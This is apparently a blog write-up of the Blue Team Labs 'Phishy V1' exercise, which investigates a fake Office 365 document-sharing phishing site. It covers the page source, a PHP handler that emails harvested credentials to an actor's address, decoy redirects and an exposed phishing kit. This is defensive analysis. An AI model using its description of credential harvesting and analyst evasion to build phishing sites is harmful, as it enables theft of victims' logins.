BlueTeamLabs Investigation: Phishy V1Published: 12/6/2022
You have been sent a phishing link — It is your task to investigate this website and find out everything you can about the site, the actor responsible, and perform threat intelligence work on the operator(s) of the phishing site.
When attackers deploy phishing websites, their OpSec, or lack thereof, allows security researchers and investigators to download a copy of the phishing kit for further analysis. In this scenario, a full ZIP file containing the phishing kit was left in an open directory on the web server.
The phishing site is located at the URL
The page is an attempt at copying an Office365 secure document transfer website and asks the user to provide their O365 credentials to view the shared file.
The top left of the page says Microsoft Docs. While this does exist, Microsoft Docs is used for Microsoft’s documentation on its products and not for document transfers. The website also uses HTTP and not HTTPS, as would be expected from a legitimate website.
Viewing the page’s HTML code reveals a suspicious PHP file named
jeff.php to which the credentials entered into the login form are sent.
The HTML comments contain the phrase
Thanks to PHP Bloke. This text would good to use as a pivot to uncover other phishing websites in the wild using this kit, or similar.
If we view the source for the webpage CSS at
style.css. The background behind the login form is actually an image named
axCBhIt.png, not any HTML content.
The webpage background image
These factors, and others, combined with the non-Microsoft URL prove in no uncertain terms that this is not a legitimate Office 365 file transfer website and is definitely a phishing site.
When searching the website for more information, the website
hxxp://securedocument[.]net redirects to
hxxp://securedocument[.]net/cgi-sys which is a default cPanel page.
The source code of this page shows this page was actually copied from another website using HTTrack Website Copier.
Phishing operators will often redirect all non-phishing URLs to generic websites in an attempt to mislead analysts and automated scanning tools.
The operator of the phishing website left a copy of the phishing kit in a
.zip format at the URL
ubuntu@ip-10-0-3-0:~/Downloads$ sha256sum 0ff1cePh1sh.zip
jeff.php is used to process credentials submitted in the web form. The PHP source code shows that the credentials are being sent to the email address
boris.smets@tfl-uk[.]co. On submission of the credentials, the victim is then redirected to the legitimate website
index.html result in a redirect to
index1.html along with a URL parameter derived from the current time using the
This phishing website will not actually work as intended, so the operator will not receive any credentials. This is because in the HTML form on the main page, the email and password variables are being assigned the names
passss respectively. However,
jeff.php expects the variable names
pass1 to be passed from the submitted form.